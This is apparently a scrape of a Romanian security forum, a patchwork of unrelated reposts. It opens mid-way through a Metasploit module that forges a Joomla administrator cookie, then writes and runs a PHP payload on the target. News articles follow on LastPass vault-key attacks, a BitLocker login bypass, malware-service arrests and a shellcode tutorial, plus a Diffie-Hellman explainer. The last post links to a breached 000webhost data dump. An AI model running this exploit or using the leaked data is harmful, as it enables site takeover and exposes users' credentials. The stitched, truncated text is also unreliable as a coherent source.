=> 'GET', 'uri' => normalize_uri(target_uri.path, "administrator", "index.php") }) if res && res.code == 200 && res.get_cookies =~ /^([a-z0-9]+)=[a-z0-9]+;/ cookie_begin = $1 print_status("#{peer} - Retrieved unauthenticated cookie [ #{cookie_begin} ]") else fail_with(Failure::Unknown, "#{peer} - Error retrieving unauthenticated cookie") end # Modify cookie to authenticated admin auth_cookie = cookie_begin auth_cookie << "=" auth_cookie << auth_cookie_part auth_cookie << ";" # Authenticated session res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "administrator", "index.php"), 'cookie' => auth_cookie }) if res && res.code == 200 && res.body =~ /Administration - Control Panel/ print_status("#{peer} - Successfully authenticated as Administrator") else fail_with(Failure::Unknown, "#{peer} - Session failure") end # Retrieve template view res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "administrator", "index.php"), 'cookie' => auth_cookie, 'vars_get' => { 'option' => 'com_templates', 'view' => 'templates' } }) # We try to retrieve and store the first template found if res && res.code == 200 && res.body =~ /\/administrator\/index.php\?option=com_templates&view=template&id=([0-9]+)&file=([a-zA-Z0-9=]+)/ template_id = $1 file_id = $2 else fail_with(Failure::Unknown, "Unable to retrieve template") end filename = rand_text_alphanumeric(rand(10)+6) # Create file print_status("#{peer} - Creating file [ #{filename}.php ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "administrator", "index.php"), 'cookie' => auth_cookie, 'vars_get' => { 'option' => 'com_templates', 'task' => 'template.createFile', 'id' => template_id, 'file' => file_id, }, 'vars_post' => { 'type' => 'php', 'name' => filename } }) # Grab token if res && res.code == 303 && res.headers['Location'] location = res.headers['Location'] print_status("#{peer} - Following redirect to [ #{location} ]") res = send_request_cgi( 'uri' => location, 'method' => 'GET', 'cookie' => auth_cookie ) # Retrieving template token if res && res.code == 200 && res.body =~ /&([a-z0-9]+)=1\">/ token = $1 print_status("#{peer} - Token [ #{token} ] retrieved") else fail_with(Failure::Unknown, "#{peer} - Retrieving token failed") end if res && res.code == 200 && res.body =~ /(\/templates\/.*\/)template_preview.png/ template_path = $1 print_status("#{peer} - Template path [ #{template_path} ] retrieved") else fail_with(Failure::Unknown, "#{peer} - Unable to retrieve template path") end else fail_with(Failure::Unknown, "#{peer} - Creating file failed") end filename_base64 = Rex::Text.encode_base64("/#{filename}.php") # Inject payload data into file print_status("#{peer} - Insert payload into file [ #{filename}.php ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "administrator", "index.php"), 'cookie' => auth_cookie, 'vars_get' => { 'option' => 'com_templates', 'view' => 'template', 'id' => template_id, 'file' => filename_base64, }, 'vars_post' => { 'jform[source]' => payload.encoded, 'task' => 'template.apply', token => '1', 'jform[extension_id]' => template_id, 'jform[filename]' => "/#{filename}.php" } }) if res && res.code == 303 && res.headers['Location'] =~ /\/administrator\/index.php\?option=com_templates&view=template&id=#{template_id}&file=/ print_status("#{peer} - Payload data inserted into [ #{filename}.php ]") else fail_with(Failure::Unknown, "#{peer} - Could not insert payload into file [ #{filename}.php ]") end # Request payload register_files_for_cleanup("#{filename}.php") print_status("#{peer} - Executing payload") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, template_path, "#{filename}.php"), 'cookie' => auth_cookie }) end end Sursa: https://www.exploit-db.com/exploits/38797/

A programmer wrote scripts to secretly automate a lot of his job — and email his wife and make a latte Julie Bort There's a hilarious project that's popular on GitHub, the website that hosts all kinds of software that programmers want to share with each other. The project was shared by a programmer named Nihad Abbasov, known as "Narkoz" on GitHub. It consists of a bunch of software scripts with some funny but NSFW names. Narkoz says that the scripts came from one of his coworkers who left for another company, the type of guy that "if something — anything — requires more than 90 seconds of his time, he writes a script to automate that." After the guy left for a new job, his former coworkers were looking through his work and discovered that the guy had automated all sorts of crazy things, including parts of his job, his relationships, and making coffee. The guy wrote one script that sends a text message "late at work" to his wife and "automatically picks reasons" from a preset list of them, saysNarkoz. It sent this text anytime there was activity with his login on the company's computer servers after 9 p.m. He wrote another script relating to a customer he didn't like, given the not-nice name he chose for this script. It scans his inbox for an email from the customer that uses words like "help," "trouble," and "sorry" and automatically rolls the guy's database to the latest backup, then sends a reply: "No worries mate, be careful next time." With another script, he automatically fired off an email excuse like "not feeling well, working from home" if he wasn't at work and logged in to the servers by 8:45 a.m. He called that script "hangover." And the best one? He wrote a script that waits 17 seconds, then hacks into the coffee machine and orders it to start brewing a latte. The script tells the machine to wait another 24 seconds before pouring the latte into a cup, the exact time it takes to walk from the guy's desk to the coffee machine. And his coworkers didn't even know the coffee machine was on the network and hackable. Sursa: http://www.businessinsider.com/programmer-automates-his-job-2015-11

As a side project I have been doing some self-study on encryption to better understand it. It is how we protect our data as it travels across the internet or when at rest, we use concepts from it to verify that we sent messages, and whole currency schemes are built around the idea. Encryption is an incredibly dense topic and it is easy to mess up. As such, all of the code I have written should not be used for any real encryption. The goal here is to make some of the concepts easier to understand. For those interested in learning more about the history, I quite enjoyed The Code Book. As for a more in-depth understanding of cryptography, take a look at Cryptography Engineering. Then you and I can struggle through it together! Diffie-Hellman Key Exchange The first topic for encryption we will go over is the Diffie-Hellman Key Exchange (DHKE). I think there is no better way to explain the basics than how Wikipediadoes, specifically in the image below. Alice and Bob want to share a key to encrypt their communications. Using paint (instead of math) we think of it like so: Alice and Bob decide on a common paint color Alice and Bob pick their own secret paint color Alice and Bob combine their secret color with the common color Alice and Bob trade this mixed paint Alice mixes Bob’s paint with her secret color Bob mixes Alice’s paint with his secret color Now Alice and Bob have a shared secret color (Alice and Bob will be recurring characters so you will have to get used to them!) DHKE described using paint (courtesty Wikipedia) The Key This section is more of a big picture section, so if you already have a basic understanding of encryption feel free to move on (or not, maybe you enjoy reading what I write). A key, in cryptography, is used to lock and unlock a message. But imagine trying to share a key and send a message to someone via a courier. If the message is clear text, the courier can read it. So we encrypt it. How do we then share a key with that person to decrypt it? If we just send the key, then the courier has that also and can decrypt it. DHKE aims to solve that problem. Let’s take a look at a working example. A Working Example I wrote some code to handle this which you can find here. Below is the output you can see from running it (with some flags to make it more verbose). DHKE between Alice and Bob A note on my iconography: x -> y : means x sends a message to y Internal means that it is occurring locally for that person First Alice tells Bob to set his prime base to 5 (and Eve, who is attempting to eavesdrop, sees this). Then Alice tells Bob to set his prime mod to 23 (which Eve also sees). Then both Alice and Bob create a random secret and perform a calculation using that secret and the prime base and prime mod. Then Alice tells Bob the result of her calculation and vice versa (and Eve sees both of these). Finally they perform one more set of calculations and arrive at a shared secret. DHKE In Math So how does this actually work? Modular arithmetic to the rescue! The equation that we are looking at is g^x mod p. g and p combine (sort of) to make our common paint. There are some restrictions around what numbers we are allowed to choose for g and x, one of which I discuss later, but we do know that p is prime. x is where this gets interesting. Alice and Bob will each select their own secret number for this (their secret paint as it were), a and b respectively. This can be any number. Then each calculates g^x mod p, and shares it (their mixed paint). Now Alice has g^b mod p (B from now on) from Bob and Bob has g^a mod p (A from now on) from Alice (Eve would have these as well). Then each takes their secret key and combines it mod p with the number they received. So Alice has B^a mod p and Bob has A^b mod p, which is their secret key. Wait, B^a mod p and A^b mod p are the secret keys? That must mean they are the same value! How cool is that? Let’s go back through the steps to understand it better. Alice and Bob decide on two numbers g and p. Alice and Bob select a secret number, a and b respectively Alice and Bob calculate g ^ x mod p where x is their number Alice and Bob share these numbers (A and Alice and Bob combine the shared number with their secret to generate the shared secret So let’s look at what we have at step 5: Alice has: B^a mod p = (g^b mod p) ^ a mod p = g^ab mod p Bob has: A^b mod p = (g^a mod p) ^ b mod p = g^ab mod p You might be saying, I still don’t get why that works. This is where a deeper understanding of modular arithmetic comes in handy. I will walk you through some of the basics (or not, if you have already had enough math, but I would say soldier on, you only need elementary math knowledge for the most part). When we calculate something like y mod z what we are really calculating is the remainder of y / z (or y % z in a lot of programming languages). When y < z then y % z is y. When it is larger it works like a clock. As y grows y % z will go through all values 0 to z – 1 until it is a multiple of z and then it will go back to 0 and then it will proceed through all of those values again. It turns out that the exponentiation operation in modular arithmetic is transitive. So (a ^ ^ c mod d = (a ^ c) ^ b mod d = a^ (bc) mod d. So Alice is calculating (g^b mod p) ^ a mod p which is (g^^a mod p. From that, both sides end up having g^ab mod p. This is where one of the restrictions on g and p comes in. For a ^ b mod c, the possible results can be limited depending on the numbers selected. Let’s look at an example: a ^ b mod 7. 2 ^ 1 mod 7 = 2 mod 7 = 2 2 ^ 2 mod 7 = 4 mod 7 = 4 2 ^ 3 mod 7 = 8 mod 7 = 1 2 ^ 4 mod 7 = 16 mod 7 = 2 2 ^ 5 mod 7 = 32 mod 7 = 4 2^ 6 mod 7 = 64 mod 7 = 1 … See where that is an issue? It only results in 3 numbers which means that the possible secret keys are only half of all numbers less than 7 can be a key (and limiting the key space is a bad thing!). So instead we pick a number like 3: 3 ^ 1 mod 7 = 3 mod 7 = 3 3 ^ 2 mod 7 = 9 mod 7 = 2 3 ^ 3 mod 7 = 27 mod 7 = 6 3 ^ 4 mod 7 = 81 mod 7 = 4 3 ^ 5 mod 7 = 243 mod 7 = 5 3^ 6 mod 7 = 729 mod 7 = 1 …. Here we can see that 3^x mod 7 can be any number less than 7, so our key space is larger. If you want to learn more about that it’s called a primitive root modulo n. The Benefits Alice and Bob have managed to generate the same number, but how does that solve this problem. Let’s look at this from Eve’s perspective. What Eve see’s from Alice and Bob’s DHKE Without any of the flags, the output shows what Eve can see only. In this example, Eve sees g and p as well as A and B. To determine what the secret key is, Eve needs to determine what a (or is, which means solving this equation for a: A = g^a mod p. As it turns out, this is a very tough equation to solve. These tough problems are often called trap door functions, functions that are easy to calculate in one direction, but not in the other (some doors you can’t come back from). This problem is specifically called the discrete logarithm problem, if you’re interested in looking further. That means that Alice and Bob have shared a number, over an insecure medium, without revealing what that number is. Using that number, they can now send messages that are encrypted that they both can decrypt. Yay! Now you know a little bit more about DHKE and how we protect our secrets. To promote further security, we actually will regenerate a key for each session. So if one of your keys traded in this manner is ever actually calculated, it only affects that session. This is what we call forward secrecy! I have two more concepts on deck to talk about soon (you may have noticed the git repository), the RSA algorithm for asymmetric encryption and HMACs. Once I have them completed the last sentence will contain links! Go forth and hack encrypt! References: https://en.wikipedia.org/wiki/Diffie%E2%80%93Hellman_key_exchange https://en.wikipedia.org/wiki/Discrete_logarithm_problem https://en.wikipedia.org/wiki/Primitive_root_modulo_n Malarkey Sursa: https://warroom.securestate.com/index.php/encryption-basics-dhke/

Alleged Malware Service Operators Arrested in UK By Eduard Kovacs on November 23, 2015 A partnership between the security firm Trend Micro and the United Kingdom’s National Crime Agency (NCA) resulted in the arrests of two individuals suspected of running a website that offered cybercrime services. The suspects, a man and a woman aged 22 from Colchester, Essex, are believed to have operated a counter antivirus service called reFUD.me and a crypting service named Cryptex Reborn. They have been released on bail until February 2016. Both the Cryptex Reborn and reFUD.me services have been disrupted as a result of the operation. ReFUD.me, which emerged in February 2015, allowed cybercriminals to upload their malware samples to see if they would be detected by the products of various antivirus companies. ReFUD.me was similar to VirusTotal, but unlike the Google-owned scanning service, it did not share scanned files with antivirus vendors. Before it was shut down, the reFUD.me website claimed that more than 1.2 million scans had been conducted since February 2015. One of the most recent features added to the cybercrime service, dubbed “scanwatch,” allowed users to constantly monitor the detection status of the files they uploaded. Cryptex Reborn, the evolution of a toolkit advertised since as early as October 2011, allowed malware developers to encrypt their files in an effort to make them “Fully UnDetectable” (FUD). Malware authors could use the product after paying a $20 monthly subscription fee or $90 for lifetime usage. The first versions of the tool, called Cryptex, Cryptex Lite and Cryptex Advanced, all surfaced in 2011. Cryptex Reborn, which is said to offer one of the most sophisticated forms of crypting seen in recent years, was first advertised on cybercrime forums in September 2014, said Trend Micro. “This investigation is the result of Trend Micro’s collaboration with the National Crime Agency of the UK (NCA) and other partners to tackle some of the core components that enable cybercriminal business models to exist,” said Martin Rösler, senior director of The Forward-Looking Threat Research team for Trend Micro. “Helping to take down operations such as this is part of our ongoing effort to keep the world safe for exchanging digital information, for both our customers and the Internet at large.” The collaboration between Trend Micro and the NCA is the result of a memorandum of understanding signed by the two organizations in July. Sursa: http://www.securityweek.com/alleged-malware-service-operators-arrested-uk

E bolnav, are cafenorologie. Trebuie sa facem niste donatii de expresso urgent!

https://veracrypt.codeplex.com/ https://ciphershed.org/ https://truecrypt.ch/

Clasic:

Small toolkit for easy creation and usage of various python scripts that work with embedded devices. core - contains most of toolkits basic functions databases - contains databases, like default credentials etc. interface - contains code that is being used for the creation and manipulation with interface modules - contains structure of modules, that can be loaded, every module contains vendor specific sub-modules where scripts are stored. decryptors exploits harvesters misc scanners [*]output - output goes here This is still heavy work-in progress Link: https://github.com/j91321/rext

Flaws found in LastPass password manager by security researchers David Bisson November 17, 20159:30 pm Two security researchers have discovered a number of bugs, bad practices, and design issues in the popular LastPass password manager. Martin Vigo and Alberto Garcia Illera, both security engineers at Salesforce.com, recently presented their analysis of LastPass at Black Hat Europe 2015. In a blog post describing their findings, Vigo and Garcia say that after conducting some preliminary research, the duo decided to see if they could attack LastPass's password vault directly and obtain access to LastPass credentials via three different techniques: client-side attacks, LastPass-side attacks, and attacks from the outside. Regarding the first method of attack, the researchers found a way to exploit session cookies, allowing them to gain access to the encrypted vault key. "We can use the session cookie to query LastPass and obtain the pwdeckey value," the duo explained. "Once we have that, we can derive a key by doingSHA256(pwdeckey). Now we just need to extract the encrypted vault key from the SQLite DB and decrypt it using the key we just derived." After unearthing some weaknesses in the way LastPass configured its two-factor authentication protocols, Vigo and Garcia eventually found a way to recover a disabled One Time Password (known as a dOTP, and which the researchers describe as a "master password on steroids") that is stored locally on a user's machine. "This is key to understand the advantage of this attack versus stealing the master password which needs the victim to have previously clicked 'Remember Password'," the researchers note. The duo finally used the dOTP to obtain the session cookie and the encrypted vault key, which they decrypted using the dOTP. Moving on to LastPass-side attacks, Vigo and Garcia found that the vault itself was not encrypted per se but instead presented cleartext metadata with encrypted values. (The URLs/icons were only encoded, whereas credentials were encrypted using a weak method.) They also found that LastPass added a "custom_js" parameter to every Account node: "Javascript code that will be injected and run in every page load in the domain’s context. While this is a legitimate feature, it gives LastPass the possibility of stealing all your credentials." For outside attacks, the researchers do not go into too much detail in the blog post, and instead direct readers to view the slides of their talk. At first glance, these bugs with LastPass might seem to endorse the actions of those who - against the advice of some - immediately decided to migrate away from LastPass after the company was bought by LogMeIn. But, as Vigo and Garcia note, LastPass may not be the only password manager with vulnerabilities, and its development team have at least responded to the findings in what seems to be a responsible and timely manner: We found a number of bugs, bad practices and design issues and used them to obtain the vault key and decrypt all passwords in different scenarios. There is no bug-free software and any future research on other password managers would likely have similar results. LastPass has responded and fixed most of the issues in less than 72 hours. "We want to point out that the security team at LastPass responded very quickly to all our reports and lot of the issues were fixed in just a couple days," the pair explain. "It was very easy to communicate and work with them." Password managers can have their weaknesses, but as pointed out by Bob Covello on Tripwire's The State of Security blog, even faulty password managers are a good choice versus users storing their passwords in local files. LastPass has taken responsibility for its bugs; it stands to reason that many of these issues will therefore not resurface going forward. Sursa: https://grahamcluley.com/2015/11/flaws-lastpass-password-manager-security-researchers/

Researcher Demonstrates Simple BitLocker Bypass By SecurityWeek News on November 18, 2015 BitLocker, the disk encryption solution implemented in the Windows operating system starting with Windows Vista, does not require sophisticated tools or exploits to be bypassed on systems that do not have the latest patches from Microsoft installed, security researcher Ian Haken claims. With the help of BitLocker, users can lock their entire computer with full-disk encryption, thus ensuring that an attacker cannot access data. BitLocker is available on professional and enterprise versions of Windows and was also designed to protect the pre-boot process from modification using the Trusted Platform Module (TPM), which is also being used to safely store its secret key for the full-disk encryption. A TPM is a hardware chip designed to performing cryptographic operations and to store secrets, and its use enables BitLocker to decrypt the operating system partition on boot without requiring pre-boot authentication. However, there is the option to require re-boot authentication, meaning that the user has to supply a PIN or insert a USB key containing a saved secret key. One of the Security Support Providers (SSPs) in Windows is Kerberos, and Ian Haken, a researcher at security firm Synopsys, discovered a vulnerability that could allow an attacker to bypass the Kerberos authentication and to decrypt drives encrypted with BitLocker. For the exploit to be successful, however, BitLocker on the target system has to be enabled without a PIN or USB key (pre-boot authentication), the machine should be domain-joined, and the attacker needs physical access to it. To bypass authentication, Haken explained that the attacker needs to set up a Kerberos Key Distribution Center (KDC), needs control of the network communication and needs to direct communication to the attacker-controlled “mock" domain controller. By connecting the machine to the mock domain controller (DC), the attacker can trigger a password reset action, thus gaining access to the encrypted drives. According to the researcher, in this scenario, the attacker does not know the user password and the machine password, although it controls both the Windows login screen and the mock DC account database where they will be setting a new user password. To be successful, the attacker needs to trigger the password change Kerberos protocol by setting the mock DC to inform the workstation that the user password has expired. According to Haken, the DC does not have to provide authentication and the workstation prompts the user for a new password, thus allowing the attacker to initiate the exchange. Since the new password is not present on the DC, the login attempt will fail, but the attacker gains access to the machine by disabling network communication, which results in the workstation reverting to local account credentials, now known to the attacker. “This attack is 100% reliable on affected systems, is not sophisticated (no custom tool was developed, no patches to Samba were necessary, and it was executed with just a few shell commands), and can be executed in a matter of seconds. Configuring Samba manually, this can be done in under a minute. If a tool was written to respond automatically based on DNS/Kerberos requests (thus automatically determining the domain/realm and the username), this could be used to bypass the login screen in a matter of seconds,” the researcher explained. Microsoft resolved the vulnerability in last week’s set of patches (Patch Tuesday) by adding an additional authentication check and claims that it was unaware of any attack attempting to exploit this bypass at the time the fix was released. The issue was found to affect all Windows versions from Windows Vista Service Pack 2 onwards, except for Windows RT or Windows RT 8.1, the company explains in a security bulletin. Sursa: Researcher Demonstrates Simple BitLocker Bypass | SecurityWeek.Com

Thanks, tehnic vorbind, nu contine nimic Practic, nici partea a II-a nu acopera "shellcodes", dar in partea a III-a, sper eu, multi vor putea intelege cum se scriu.

Introduction to Windows shellcode development – Part 1 October 30, 2015 Ionut Popescu This article contains an overview of shellcode development techniques and their specific aspects. Understanding these concepts allows you to write your own shellcode. Furthermore, you could modify existing exploits that contain already made shellcode to perform custom functionality that you need. Introduction Let’s say you have a working exploit in Internet Explorer or Flash Player that openscalc.exe. This isn’t really useful, is it? What you really want is to execute some remote commands or to do other useful functionality.In this situation you may want to use standard existing shellcode as the ones from Shell Storm database or generated by from Metasploit’s msfvenom tool. However, you must first understand the basic principles of shellcoding so you can use them effectively in your exploits. Article: http://securitycafe.ro/2015/10/30/introduction-to-windows-shellcode-development-part1/

Link: Oferta: dam tot 13 noiembrie - DOMO.ro Info: Domo isi va inchide toate magazinele - surse - IT - HotNews.ro Edit: Nu e cine stie ce.

000Webhost Data Dump https://000webhost.thecthulhu.com/